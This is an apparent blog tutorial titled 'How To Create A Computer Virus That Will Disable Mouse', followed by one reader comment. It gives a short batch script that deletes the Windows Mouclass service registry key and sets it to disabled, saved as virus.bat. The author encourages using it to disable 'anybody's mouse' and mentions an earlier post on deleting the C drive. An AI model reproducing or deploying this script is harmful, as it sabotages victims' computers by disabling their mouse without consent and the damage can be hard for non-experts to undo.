-->

How To Create A Computer Virus That Will Disable Mouse

- February 06, 2017



friends! Welcome back to my new post. In the previous post I told you how to make a computer virus that can delete C Drive Completely. In this post I wil teach you how to create a computer virus that can disable mouse. You can use this trick to disable anybody's mouse. Are you ready to create virus, so let's go.
Steps To Create Virus:-
1. First open notepad and copy blow code and paste into notepad.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
2. Now save this file as virus.bat
Note:- Name can be anything but the extension of the file should be .bat
          Final Words:-
I hope you liked the post. If you have any problem related to this content you can ask. Don't read it alone share it with your friends because "sharing is caring."


1 comment

Raushan Kumar said...

Thankx for giving me virus